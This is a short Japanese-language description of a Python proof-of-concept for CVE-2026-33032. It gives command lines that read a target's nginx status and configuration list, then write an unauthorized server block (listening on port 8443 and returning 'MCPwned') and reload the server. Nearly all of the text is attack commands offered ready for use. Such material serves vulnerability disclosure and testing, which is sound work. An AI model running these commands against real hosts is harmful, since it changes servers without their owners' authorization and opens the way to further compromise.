
CVE-2026-33032 用の Python 概念実証コードです。nginx のステータスと設定を検査し、その後、不正な設定書き込みとリロードを実演して、不正なサーバーブロックを展開する方法を示します。
python3 main.py http://target:9000 --tool nginx_status
python3 main.py 10.0.0.50 --tool nginx_config_list
python3 main.py http://target:9000 \
--tool nginx_config_add \
--payload poc.conf \
--content 'server { listen 8443; return 200 "MCPwned\n"; }'